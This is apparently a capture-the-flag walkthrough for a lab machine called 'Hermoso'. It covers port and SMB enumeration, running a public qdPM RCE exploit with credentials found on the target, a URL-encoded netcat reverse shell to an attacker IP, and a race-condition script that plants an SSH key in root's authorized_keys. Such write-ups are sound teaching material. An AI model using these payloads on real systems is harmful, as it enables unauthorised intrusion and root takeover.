Hermoso

Enumeration

Nmap

nmap -sC -sV 10.10.164.84

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-11 02:49 EST
Nmap scan report for 10.10.164.84
Host is up (0.39s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72d156054b7fa6a83452f5abbb4bc0e1 (RSA)
|   256 a37505ae8e2189e50704c7a49e1d966a (ECDSA)
|_  256 229563cf260081f4f8e18afdf236322a (ED25519)
53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -2h39m59s, deviation: 4h37m06s, median: 0s
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-12-11T07:49:54
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: ubuntu
|   NetBIOS computer name: UBUNTU\x00
|   Domain name: \x00
|   FQDN: ubuntu
|_  System time: 2022-12-11T15:49:53+08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.74 seconds

SMB

As we can see from the nmap output above, port 139 and 445 is open.

We can then use smbclients to see what shares is available to let user to access it.

smbclient -L '\\10.10.164.84\'

We try to access the Development share

smbclient '\\10.10.164.84\Development'

Access Denied :(

We further try to access the Secret share.

It has a hidden secret file laying in this share.

Got a credential, maybe useful at some places 👀

HTTP

port 80 is open! Lets navigate through.

We got a apache page, we can try to directory brute force it using gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.164.84/

===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.164.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/11 03:02:40 Starting gobuster in directory enumeration mode
===============================================================
/project              (Status: 301) [Size: 314] [--> http://10.10.164.84/project/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.164.84/wordpress/]
/test                 (Status: 301) [Size: 311] [--> http://10.10.164.84/test/]

We got few result, let's navigate to /project

Ah, a web application, the first thing we look for is the version of the qdPM it is using. As we can see, it is using version 9.1

We can use searchsploit to find the RCE script.

Let's use the Remote Code Execution that is Authentication Version 2

Exploit

We need to specify the parameter in order to exploit the vulnerable web application. We will use the credential we found at the SMB secret share.

python3 50944.py -url http://10.10.164.84/project/ -u chris@hermoso.local -p dontL1k3w0rk1ngH3r3

Navigate to the backdoor.

Backdoor is working!

Reverse Shell

Go to revshell to generate a reverse shell payload.

What I like to use for this type of command reverse shell is mkfifo reverse (Work most of the time).

You need to encode with URL Encode.

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.4.7.170%204444%20%3E%2Ftmp%2Ff

Got a reverse shell!

We then need to spawn a proper shell by using python

python -c 'import pty; pty.spawn("/bin/bash");'

User Escalation

After come poking around, we found out that the user flag is at the user chris folder.

And currently we don't have permission to read it.

We remembered there is a wordpress folder being scanned during the gobuster session.

We can see there is a wp-config.php.bak is laying around there!

Upon reading the file, we found out that there is a credential of Chris in there.

We can then switch user to Chris and get the user flag!

Since we have the credentials, we might as well use SSH for the stable connection.

Privilege Escalation

By supplying sudo -l we can see that user Chris can execute a script using sudo!

We can go to read this script for a better understanding of what it does.

#!/bin/bash

checkAdded(){
        name=$(/bin/echo $sshKey | /usr/bin/cut -d " " -f 3)
        if [[ ! -z $(/bin/grep $name /root/.ssh/authorized_keys) ]]; then
                /bin/echo "Successfully added $name to authorized_keys file!"
        else
                /bin/echo "ssh of $name is not added to authorized_keys file!"
        fi
}

checkFile(){
        if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
                /bin/echo "Error creating key file!"
                if [[ -f $1 ]]; then /bin/rm $1; fi
                exit 1
        fi
}

addKey(){
        tmp=$(mktemp -u /tmp/ssh-XXXXXXXX)
        (umask 110; touch $tmp)
        /bin/echo $sshKey >>$tmp
        checkFile $tmp
        /bin/cat $tmp >>/root/.ssh/authorized_keys
}

sshKey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDaNF5U1mllAUVO+j5IfhXmmiZWN8Nr8Juyy1/BYlv24vNB8+kQGmUgYRvv/bA10JwCZ3jC1F71hzxRNOiVeC+FpHf/chb9Sk8lj71CyHCCy1bxwRrXRXPiW8+FTqQ7J+f8WLOWSnFBD84zWt0rW31QcERz1semYIt/x9tXS45r3ibkuLTW2UeYhKZMhsuNHR1AgB1E0HcbDvASwJWSojaQE2Ety5ze55gR7VOKszVPVV1XDY8frOZ5a81dxtkAVCH17bIQUPTCcFdMCE6cEglc5gm+iobrFeAqRMCTLGV9HvAcyTqclrwJy9g/stwBrgAdKcOiC2oowlj1zDeztG43UOJDV0bDmyNSBtl0z+YXrYJp1LwShy6y/dYzPrQrxAiu94N5ryO0E1f5OBbwH3duNmR9K5r2fZuDjrHT7O+RZOZRhbgJuwvxgqJbA5EIOI5hwaKOINutx921VnLBMkaIBsoHaLUOfBNCuuiaLBfTEms9l/kaBiFqxIOZBNyfwZs= root@ubuntu"
addKey
checkAdded

addKey function

addKey(){
        tmp=$(mktemp -u /tmp/ssh-XXXXXXXX)
        (umask 110; touch $tmp)
        /bin/echo $sshKey >>$tmp
        checkFile $tmp
        /bin/cat $tmp >>/root/.ssh/authorized_keys
}

What this function does it creates a temporary file inside /tmp and it copy the sshKey into the created file. Then, it copies the content from the file into root ssh authorized_keys file.

How can we exploit this? Since the sshKey that it writes into the temporary file is static, we can write our own public key to the authorized_keys faster than the script itself. Therefore, this is a Race Condition exploit.

As we know, if inside the authorized_keys file has the public key of our key, we can ssh into the user without needing any password.

we can go ahead to create a ssh key.

ssh-keygen -t rsa

Don't need any password, press enter all the way.

We can then open another session of ssh

At second session, we can do nano exploit.sh

#!/bin/bash

key='your-generated-ssh-keybash'

while true
do
        echo $key | tee /tmp/ssh-* > /dev/null;
done

Run the second session exploit first with your exploit.

Then only run the first session sudo script.

sudo /usr/local/bin/CopySSHKey.sh

Then, we can go to our Kali machine and login using the private key that we created pair with the public key

ssh -i id_rsa root@10.10.164.84

Rooted!

Congratz!